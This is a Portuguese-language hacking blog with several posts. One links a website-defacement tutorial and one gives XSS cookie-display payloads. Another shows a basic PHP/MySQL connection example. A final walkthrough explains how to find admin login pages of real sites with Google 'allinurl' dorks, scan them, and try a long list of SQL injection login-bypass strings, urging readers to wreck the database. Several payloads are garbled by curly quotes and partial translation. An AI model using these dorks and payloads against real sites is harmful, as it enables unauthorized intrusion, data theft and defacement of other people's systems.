Pesquisar

Mostrando postagens com marcador SQL. Mostrar todas as postagens
Mostrando postagens com marcador SQL. Mostrar todas as postagens

3 de fev. de 2013

Mini curso defacer

Tutorial defacer na área!

O cara que criou esse tutorial todo numa página html merece um bitcoin pelo esforço e meses dedicados a fazer esse tutorial! heuheuheuheue.
Sem mas, aí vai o link:

http://danhorus.x10.bz/Tutoriais/SQLi,%20LFD%20e%20XSS.html

... Ainda tive coragem de escrever "mini" no título, MUHUHUAHAHAHHAAHAA

27 de dez. de 2012

Exemplo de Ataques XSS e de SQL Injection

... Vamos aos rápidos exemplos:

Esse código de SQL injection é inserido no campo de Login ou Username de um site, onde faz com que ele se autentique como aquele usuário com uma senha qualquer:


‘or’=1    '
)or('a'='a
‘or=1
')or('1'='1
‘or’a’=‘a
'or'1'='1


e é colocado uma senha como: xxx

Esse código Mostra a versão do Banco de Dados de MYSQL, onde user123 é conhecido pelo Hacker: 'user123' or 1=(select @@version)--    ou    ' union select @@version,1,1--


Vamos ao XSS (inserindo na URL):

Exibindo Cookies:

'"><script>alert('xss');alert(document.cookie)</script>      ou
<script>alert('xss');alert(document.cookie)</script>

3 de jul. de 2012

Aprenda um pouco sobre SQL injection online

Um ótima site que ensina sobre SQL Injection, online, é o http://sqlzoo.net/hack/ , lá você terá teoria e prática, lembrando que é apenas um tutorial não aprofundado.

Abraços, divirta-se.

11 de jan. de 2012

Como conectar PHP ao Banco de Dados MySql


Achei esse artigo de como se faz para se conectar ao banco de dados MySQL. Serão criados 2 arquivos, onde um será responsável pela conexão e o outro pela execução dos comandos SQL no banco. Vamos lá:

Arquivo: mysqlconecta.php



Arquivo: mysqlexecuta.php

<?php
/*
Esta função executa um comando SQL no banco de dados MySQL
$id - Ponteiro da Conexão
$sql - Cláusula SQL a executar
$erro - Especifica se a função exibe ou não(0=não, 1=sim)
$res - Resposta
*/

function mysqlexecuta($id,$sql,$erro = 1) {
    if(empty($sql) OR !($id))
       return 0; //Erro na conexão ou no comando SQL   
   if (!($res = @mysql_query($sql,$id))) {
      if($erro)
        echo "Ocorreu um erro na execução do Comando SQL no banco de dados. Favor Contactar o Administrador.";
      exit;
   }
    return $res;
 }
?>


Abaixo segue um exemplo de uma página PHP, usando esses dois arquivos, onde vou imprimir na tela os dados dos clientes cadastrados.

Atenção: Para que dê certo esse arquivo, suponha-se que você já tenha criado a tabela (tb_clientes) e "populado" ela com dados.

Arquivo: primeiro.php


<html>
<body>

<?
    include "mysqlconecta.php"; // Conecta ao banco de dados
    include "mysqlexecuta.php"; // Executa a cláusula SQL

    //Executa a consulta
    $sql = "SELECT * FROM tb_clientes";
    $res = mysqlexecuta($id,$sql);
?>

<table width=100% cellpading=0 cellspacing=0>

<?
   //Exibe as linhas encontradas na consulta
   while ($row = mysql_fetch_array($res)) {
?>
  <tr>
     <td><?echo $row['codigo'];?></td>
     <td><?echo $row['nome'];?></td>
     <td><?echo $row['endereco'];?></td>
     <td><?echo $row['cidade'];?></td>
     <td><?echo $row['estado'];?></td>
  </tr>

<?
 }
?>
</table>

</body>
</html>


Se tiverem dúvidas mandem aí.

fonte: http://imasters.com.br/artigo/272
<?
/* Este arquivo conecta um banco de dados MySQL - Servidor = localhost
$dbname="teste"; // Indique o nome do banco de dados que será aberto
$usuario=" "; // Indique o nome do usuário que tem acesso
$password=" "; // Indique a senha do usuário
//1º passo - Conecta ao servidor MySQL
if(!($id = mysql_connect("localhost",$usuario,$password))) {
   echo "Não foi possível estabelecer uma conexão com o gerenciador MySQL. Favor Contactar o Administrador.";
   exit;
}
//2º passo - Seleciona o Banco de Dados
if(!($con=mysql_select_db($dbname,$id))) {
   echo "Não foi possível estabelecer uma conexão com o gerenciador MySQL. Favor Contactar o Administrador.";
   exit;
}
?>

22 de out. de 2011

SQL Injection básico

É o seguinte, Este truque é aplicado ao navegador, no modo de string, que acessa o servidor, varrendo os cookies, e assim podendo liberar a entrada do administrador.

Google é seu amigo, e te ajudará nesta tarefa, pois ele te ajudará a pesquisar por páginas específicas.
Iremos então usar o comando "allinurl".
esse comando procura especificadamente aquilo que se vem depois dos dois pontos
exemplo: allinurl:/site/admin/
com esse codigo ele caçará paginas com campos de logins de adiministraçoes.
abaixo uma lista com algums codigos para vc pesquisar no google.


allinurl:/webadmin/default.asp
allinurl:/menu_admin/default.asp
allinurl:/menu_admin/index.asp
allinurl:/menu_admin/login.asp
allinurl:/noticias/admin/
allinurl:/news/admin/
allinurl:/cadastro/admin/
allinurl:/portal/admin/
allinurl:/site/admin/
allinurl:/home/admin.asp
allinurl:/home/admin/index.asp
allinurl:/home/admin/default.asp
allinurl:/home/admin/login.asp
allinurl:/web/admin/index.asp


Pegue uma das strings acima e pesquise a vontade:


Após isso saira uma lista de sites com paginas com campos de logins e senhas
ate ai tudo bem agora vamos escaniialos usando um scanner como o Acutinex
depois de scaneado e acuzando a suposta vulnerabilidade de sql injection

É só testarmos strings nos campos de login sda página afetada.


A mesma string usada no login deve ser usada no campo de senha ok.
abaixo uma lista de strings:

* b’ or ‘ 1=’
* ‘ or ‘1
* ‘ or ‘|
* ‘ or ‘a’='a
* ‘ or ”=’
* ‘ or 1=1–
* ‘) or (’a'=’a
* ‘ or ‘1′=’1
* admin ‘ – -
* ‘ ou 0=0 –
* “ou 0=0 –
* ou 0=0 –
* ‘ ou 0=0 #
* “ou 0=0 #
* ou 0=0 #
* ‘ ou ‘ x’='x
* “ou” x”=”x
* ‘) ou (’ x’='x
* ‘ ou 1=1 –
* “ou 1=1 –
* ou 1=1 –
* ‘ ou a=a –
* “ou” a”=”a
* ‘) ou (’ a’='a
* “) ou (”a”=”a
* hi “ou” a”=”a
* hi “ou 1=1 –
* hi ‘ ou 1=1 –
* hi ‘ ou ‘ a’='a
* hi ‘) ou (’ a’='a
* hi”) ou (”a”=”a
* ‘ or ‘x’='x


Teste até conseguir, faça uma confusão no Banco de dados.